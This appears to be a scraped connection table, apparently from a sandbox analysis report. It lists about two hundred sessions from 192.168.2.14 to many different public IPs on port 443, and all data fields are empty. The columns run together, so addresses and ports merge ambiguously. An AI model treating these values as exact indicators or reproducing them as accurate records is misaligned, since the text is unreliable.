                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16154192.168.2.1451928135.23.39.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16155192.168.2.1458694103.32.135.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16156192.168.2.144408893.202.191.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16157192.168.2.1454594218.108.113.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16158192.168.2.1453354208.92.75.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16159192.168.2.145844696.6.126.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16160192.168.2.1445030168.27.103.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16161192.168.2.1440304220.46.112.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16162192.168.2.1433862180.196.127.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16163192.168.2.1434934217.1.21.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16164192.168.2.14601424.230.138.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16165192.168.2.1456484112.26.239.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16166192.168.2.14406628.49.90.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16167192.168.2.145761073.221.104.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16168192.168.2.1444374156.108.109.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16169192.168.2.1443156169.63.167.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16170192.168.2.1442888169.0.134.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16171192.168.2.144891264.124.18.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16172192.168.2.1436072222.194.82.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16173192.168.2.1440396185.122.7.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16174192.168.2.144193696.31.240.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16175192.168.2.1442606205.248.19.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16176192.168.2.1446552157.39.14.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16177192.168.2.1438292148.85.13.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16178192.168.2.1441522124.58.55.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16179192.168.2.1451592193.142.144.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16180192.168.2.143710634.165.123.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16181192.168.2.1460868210.4.102.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16182192.168.2.1457388149.35.218.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16183192.168.2.1433436143.121.202.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16184192.168.2.1442522184.132.39.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16185192.168.2.1454310206.121.77.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16186192.168.2.143844690.10.185.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16187192.168.2.1460286133.40.13.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16188192.168.2.1452050148.52.122.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16189192.168.2.1459426101.104.55.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16190192.168.2.1451582202.202.44.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16191192.168.2.1436086159.102.190.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16192192.168.2.1460138100.3.192.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16193192.168.2.145715247.73.221.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16194192.168.2.145885447.33.44.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16195192.168.2.1447264160.85.76.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16196192.168.2.144316289.20.117.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16197192.168.2.1435240154.60.145.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16198192.168.2.145004886.149.44.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16199192.168.2.1436396191.164.201.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16200192.168.2.144423684.215.84.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16201192.168.2.143543227.205.14.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16202192.168.2.1439814153.123.229.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16203192.168.2.145692645.96.230.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16204192.168.2.1434280218.155.178.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16205192.168.2.144695271.253.202.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16206192.168.2.1441402196.22.115.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16207192.168.2.1443456128.205.249.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16208192.168.2.143397025.114.138.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16209192.168.2.144889487.171.0.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16210192.168.2.1446628216.146.209.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16211192.168.2.1434074182.166.140.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16212192.168.2.1449896128.21.43.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16213192.168.2.145661492.65.60.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16214192.168.2.145342460.243.16.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16215192.168.2.145437684.194.4.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16216192.168.2.14447381.103.209.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16217192.168.2.1449828135.243.91.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16218192.168.2.1438192185.6.173.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16219192.168.2.1456606119.230.95.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16220192.168.2.144688293.12.244.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16221192.168.2.143306690.8.135.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16222192.168.2.144736878.42.234.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16223192.168.2.144016037.183.142.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16224192.168.2.14334185.133.139.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16225192.168.2.144471064.194.239.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16226192.168.2.1453196189.31.62.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16227192.168.2.144657258.44.185.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16228192.168.2.1458666213.16.137.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16229192.168.2.1437036142.122.126.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16230192.168.2.1452734106.207.97.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16231192.168.2.145559074.107.145.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16232192.168.2.144304624.107.5.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16233192.168.2.144005686.165.119.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16234192.168.2.143847675.46.160.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16235192.168.2.1442110176.187.8.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16236192.168.2.1446706147.12.113.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16237192.168.2.1447382153.37.244.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16238192.168.2.1442524101.209.199.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16239192.168.2.146018462.77.156.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16240192.168.2.1455636145.116.225.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16241192.168.2.143967070.192.76.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16242192.168.2.1456078185.62.200.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16243192.168.2.144236262.0.237.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16244192.168.2.1450472197.95.54.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16245192.168.2.143756250.19.65.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16246192.168.2.1443660163.203.2.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16247192.168.2.1449238160.56.212.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16248192.168.2.1446194100.230.83.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16249192.168.2.144780282.116.71.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16250192.168.2.1437334184.33.50.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16251192.168.2.145222613.213.52.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16252192.168.2.1452596162.235.113.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16253192.168.2.1451000149.18.126.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16254192.168.2.145617224.207.105.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16255192.168.2.146007086.249.92.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16256192.168.2.1453264208.226.242.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16257192.168.2.1448332144.200.113.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16258192.168.2.145476098.192.100.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16259192.168.2.1442888173.102.239.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16260192.168.2.1441208112.158.85.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16261192.168.2.145031446.196.38.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16262192.168.2.1446354205.82.232.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16263192.168.2.1437004212.136.113.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16264192.168.2.1452800203.244.232.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16265192.168.2.146004245.128.191.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16266192.168.2.145724667.149.154.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16267192.168.2.143803065.222.221.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16268192.168.2.145251634.19.237.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16269192.168.2.1436642165.124.57.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16270192.168.2.144603248.46.153.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16271192.168.2.146064091.126.166.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16272192.168.2.1448204180.107.233.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16273192.168.2.1434724184.159.122.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16274192.168.2.1454208188.30.16.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16275192.168.2.1453698178.178.126.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16276192.168.2.143912277.156.144.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16277192.168.2.1459548174.151.66.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16278192.168.2.14437604.183.18.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16279192.168.2.145080897.37.124.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16280192.168.2.1448116210.186.35.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16281192.168.2.1435840154.226.190.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16282192.168.2.1437752173.175.214.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16283192.168.2.1446028195.161.170.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16284192.168.2.1440952177.139.58.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16285192.168.2.1447876209.221.224.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16286192.168.2.1448818181.169.180.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16287192.168.2.144978870.24.62.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16288192.168.2.1449128178.247.100.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16289192.168.2.1460324193.42.9.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16290192.168.2.14503884.93.228.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16291192.168.2.1457630205.94.4.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16292192.168.2.145385872.64.113.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16293192.168.2.1445354156.143.6.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16294192.168.2.145859096.214.26.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16295192.168.2.1459594138.0.41.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16296192.168.2.1439786103.195.232.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16297192.168.2.143603219.32.205.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16298192.168.2.143569488.152.104.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16299192.168.2.1441488113.28.90.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16300192.168.2.1458548109.84.241.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16301192.168.2.1455210188.171.225.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16302192.168.2.1435354153.59.79.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16303192.168.2.1434880173.54.38.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16304192.168.2.1444548209.113.202.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16305192.168.2.1453686133.65.124.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16306192.168.2.143990869.173.51.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16307192.168.2.145127024.214.180.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16308192.168.2.1447904173.43.99.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16309192.168.2.1437586107.224.58.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16310192.168.2.144929232.162.160.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16311192.168.2.1453372121.200.113.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16312192.168.2.1450394185.100.93.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16313192.168.2.1458180104.112.169.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16314192.168.2.143523084.6.136.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16315192.168.2.1433024184.13.117.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16316192.168.2.1447134190.63.252.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16317192.168.2.1439416172.218.226.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16318192.168.2.1434238195.106.254.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16319192.168.2.144490464.190.198.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16320192.168.2.1435734142.216.213.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16321192.168.2.1457976159.57.181.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16322192.168.2.1456024156.57.244.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16323192.168.2.144400069.107.42.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16324192.168.2.144830450.28.112.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16325192.168.2.145490635.71.122.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16326192.168.2.145490659.208.202.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16327192.168.2.144638227.160.180.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16328192.168.2.1437622178.73.95.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16329192.168.2.1446892120.33.240.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16330192.168.2.1459970193.226.179.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16331192.168.2.145788235.208.143.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16332192.168.2.1449374138.247.111.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16333192.168.2.145625469.229.176.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16334192.168.2.144136845.246.175.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16335192.168.2.1433252158.106.254.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16336192.168.2.1456446141.254.196.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16337192.168.2.14576984.108.114.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16338192.168.2.145032049.46.105.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16339192.168.2.145924214.248.207.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16340192.168.2.143599278.116.193.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16341192.168.2.1456660139.211.200.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16342192.168.2.1449040148.250.227.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16343192.168.2.144774465.213.72.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16344192.168.2.145746081.195.161.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16345192.168.2.1443242202.74.245.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16346192.168.2.1458962111.4.112.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16347192.168.2.1438250130.85.177.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16348192.168.2.144929839.16.217.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16349192.168.2.145095662.121.126.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16350192.168.2.1460970169.185.50.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16351192.168.2.14561322.231.174.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16352192.168.2.145593889.91.112.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16353192.168.2.14462189.204.230.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16354192.168.2.144225620.128.234.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16355192.168.2.1438012137.1.77.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16356192.168.2.1443966188.153.22.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16357192.168.2.144210665.167.225.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16358192.168.2.1439316205.50.20.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16359192.168.2.1456578188.184.4.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16360192.168.2.1435510167.134.112.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16361192.168.2.1457204209.236.148.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16362192.168.2.1454672189.163.103.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16363192.168.2.143433645.101.64.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16364192.168.2.1445238103.119.168.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16365192.168.2.1444124160.153.148.201443
                                                        TimestampBytes transferredDirectionData


